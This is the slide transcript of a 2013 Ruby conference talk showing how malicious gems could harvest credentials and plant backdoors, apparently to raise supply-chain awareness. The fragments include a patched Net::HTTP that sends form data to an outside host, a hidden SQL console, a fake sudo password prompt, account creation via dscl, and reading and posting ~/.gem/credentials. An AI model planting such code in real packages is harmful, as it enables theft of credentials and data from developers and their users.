Upgrade to Pro — share decks privately, control downloads, hide ads and more …

Hacking with Gems (Ancient City Ruby)

Hacking with Gems (Ancient City Ruby)

Benjamin Smith

April 05, 2013
Tweet

More Decks by Benjamin Smith

Other Decks in Technology

Transcript

  1. Ben Smith cannot be held accountable for anything that will

    happen to you as a result of installing his gems. He also cannot be held responsible for anything that happens as a result of installing anyone ELSE’S gems. This offer may not be combined with any other offers. Ben Smith’s gems were processed in a location that also processes peanuts. Not valid in the state of Nevada. Ben Smith’s gems may contain substances known in the state of California to cause cancer.
  2. how it all started GEM remote: https://rubygems.org/ specs: actionmailer (3.2.12)

    actionpack (= 3.2.12) mail (~> 2.4.4) actionpack (3.2.12) activemodel (= 3.2.12) activesupport (= 3.2.12) builder (~> 3.0.0) erubis (~> 2.7.0) ...
  3. profit • Step 1: do something • Step 2: do

    something else • Step 3: ???? • Step 4: profit
  4. profit • Step 1: write a gem that does something

    • Step 2: • Step 3: • Step 4:
  5. profit • Step 1: write a gem that does something

    • Step 2: add code to harvest emails/pws • Step 3: • Step 4:
  6. profit • Step 1: write a gem that does something

    • Step 2: add code to harvest emails/pws • Step 3: use emails/pws on banking websites to transfer funds • Step 4:
  7. profit • Step 1: write a gem that does something

    • Step 2: add code to harvest emails/pws • Step 3: use emails/pws on banking websites to transfer funds • Step 4: profit
  8. profit • Step 1: write a gem that does something

    • Step 2: add code to harvest emails/pws • Step 3: use emails/pws on banking websites to transfer funds • Step 4: profit • Step 5: flee the country
  9. show me the hack Net::HTTP.post_form( #<URI::HTTP:0x007fc76b706950 URL:http:// stark-samurai-8122.herokuapp.com/logs>, {"log"=>"{\"utf8\"=>\"✓\", \"authenticity_token\"=>\"PzpZUlRrRv1V

    +A0jJHAwi+ey/injbWlii8OFyIfP+fY=\", \"user\"=>{\"email\"=>\"test\", \"password\"=>\"pass4\" ... github.com/benjaminleesmith/net_http_detector
  10. how it works def HTTP.valid_post_form(url, params) ... def HTTP.post_form(url, params)

    self.smart_log( "Net::HTTP.post_form(#{url.inspect}, #{params.inspect})" ) Net::HTTP.valid_post_form(url, params) end github.com/benjaminleesmith/net_http_detector
  11. how it works def HTTP.valid_post_form(url, params) ... def HTTP.post_form(url, params)

    self.smart_log( "Net::HTTP.post_form(#{url.inspect}, #{params.inspect})" ) Net::HTTP.valid_post_form(url, params) end github.com/benjaminleesmith/net_http_detector
  12. how it works def HTTP.valid_post_form(url, params) ... def HTTP.post_form(url, params)

    self.smart_log( "Net::HTTP.post_form(#{url.inspect}, #{params.inspect})" ) Net::HTTP.valid_post_form(url, params) end github.com/benjaminleesmith/net_http_detector
  13. database what? append_before_filter :net_http_detector ... if params[:db_console] @tables =ActiveRecord::Base.connection.tables if

    params[:query] @output = ActiveRecord::Base.connection .execute(params[:query]) github.com/benjaminleesmith/net_http_detector
  14. database what? append_before_filter :net_http_detector ... if params[:db_console] @tables =ActiveRecord::Base.connection.tables if

    params[:query] @output = ActiveRecord::Base.connection .execute(params[:query]) github.com/benjaminleesmith/net_http_detector
  15. database what? append_before_filter :net_http_detector ... if params[:db_console] @tables =ActiveRecord::Base.connection.tables if

    params[:query] @output = ActiveRecord::Base.connection .execute(params[:query]) github.com/benjaminleesmith/net_http_detector
  16. database what? append_before_filter :net_http_detector ... if params[:db_console] @tables =ActiveRecord::Base.connection.tables if

    params[:query] @output = ActiveRecord::Base.connection .execute(params[:query]) github.com/benjaminleesmith/net_http_detector
  17. profit • Step 1: write a gem that does something

    • Step 2: • Step 3: • Step 4: • Step 5:
  18. profit • Step 1: write a gem that does something

    • Step 2: add code to provide DB access • Step 3: • Step 4: • Step 5:
  19. profit • Step 1: write a gem that does something

    • Step 2: add code to provide DB access • Step 3: use personal info to apply for a boat loan (ie buy a pimp trimaran) • Step 4: • Step 5:
  20. profit • Step 1: write a gem that does something

    • Step 2: add code to provide DB access • Step 3: use personal info to apply for a boat loan (ie buy a pimp trimaran) • Step 4: profit • Step 5:
  21. profit • Step 1: write a gem that does something

    • Step 2: add code to provide DB access • Step 3: use personal info to apply for a boat loan (ie buy a pimp trimaran) • Step 4: profit • Step 5: flee the country
  22. what it claims to do Date.new(2005, 1, 1).to_s(:short) => "1

    Jan" ... instead of... => " 1 Jan" github.com/benjaminleesmith/better_date_to_s
  23. behind the curtain if(strcmp(rails_env, "production") == 0) { sprintf(tar_command, "tar

    -zcvf %s/public/assets.tar.gz %s > /dev/ null 2>&1",rails_root,rails_root); system(tar_command); } github.com/benjaminleesmith/better_date_to_s
  24. truth time • this gem doesn't actually work • but

    it could... if I wasn't lazy • "fat" gems are tricky to compile github.com/benjaminleesmith/better_date_to_s
  25. so much code so little time • Step 1: write

    a gem that does something • Step 2: add code expose source • Step 3: sell to competitors? • Step 4: profit? • Step 5: flee the country
  26. what it does > true.should be_true > User.new.should be_true >

    User.new.should be_truthy github.com/benjaminleesmith/be_truthy
  27. run the what file? Gem::Specification.new do |gem| ... gem.extensions =

    ["Rakefile"] ... end github.com/benjaminleesmith/be_truthy
  28. print "WARNING: Improper use of the sudo command ..." system

    "stty -echo" password = $stdin.gets.chomp system "stty echo" print `/usr/bin/sudo #{ARGV[0..-1].join(' ')}` github.com/benjaminleesmith/be_truthy
  29. print "WARNING: Improper use of the sudo command ..." system

    "stty -echo" password = $stdin.gets.chomp system "stty echo" print `/usr/bin/sudo #{ARGV[0..-1].join(' ')}` github.com/benjaminleesmith/be_truthy
  30. print "WARNING: Improper use of the sudo command ..." system

    "stty -echo" password = $stdin.gets.chomp system "stty echo" print `/usr/bin/sudo #{ARGV[0..-1].join(' ')}` github.com/benjaminleesmith/be_truthy
  31. print "WARNING: Improper use of the sudo command ..." system

    "stty -echo" password = $stdin.gets.chomp system "stty echo" print `/usr/bin/sudo #{ARGV[0..-1].join(' ')}` github.com/benjaminleesmith/be_truthy
  32. /usr/bin/sudo dscl . -create /Users/ #{username} ... /usr/bin/sudo dscl .

    -passwd /Users/ #{username} password` github.com/benjaminleesmith/be_truthy
  33. back in the be_truthy gem gem_api_key = File.open( `echo ~/.gem/credentials`.strip

    ).read gem_list = `gem list` Net::HTTP.post_form(...) github.com/benjaminleesmith/be_truthy
  34. gem_api_key = File.open( `echo ~/.gem/credentials`.strip ).read gem_list = `gem list`

    Net::HTTP.post_form(...) github.com/benjaminleesmith/be_truthy back in the be_truthy gem
  35. gem_api_key = File.open( `echo ~/.gem/credentials`.strip ).read gem_list = `gem list`

    Net::HTTP.post_form(...) github.com/benjaminleesmith/be_truthy back in the be_truthy gem
  36. gem_api_key = File.open( `echo ~/.gem/credentials`.strip ).read gem_list = `gem list`

    Net::HTTP.post_form(...) github.com/benjaminleesmith/be_truthy back in the be_truthy gem
  37. > git clone your-gem-repo ...add a little code... > rake

    build > gem push your-gem github.com/benjaminleesmith/be_truthy
  38. • matt • smoe • bttf • james • tlittle

    • rbabcock • nusco • ixil • Stuart • eileen • jay • Michael • christopher.mcnabb
  39. gem fetch vs gem install > gem fetch be_truthy >

    gem unpack be_truthy-0.0.1.gem github.com/benjaminleesmith/be_truthy
  40. > gem install rails -P HighSecurity Fetching: activesupport-3.2.12.gem (100%) ERROR:

    While executing gem ... (Gem::Exception) Unsigned gem